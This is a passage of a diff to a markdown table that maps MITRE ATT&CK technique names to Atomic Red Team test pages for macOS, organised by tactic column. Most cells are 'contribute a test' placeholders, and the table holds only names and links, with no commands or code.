| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1551.003/T1551.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Browser Extensions](../../T1176/T1176.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Launchd](../../T1053.004/T1053.004.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Rc.common](../../T1037.004/T1037.004.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
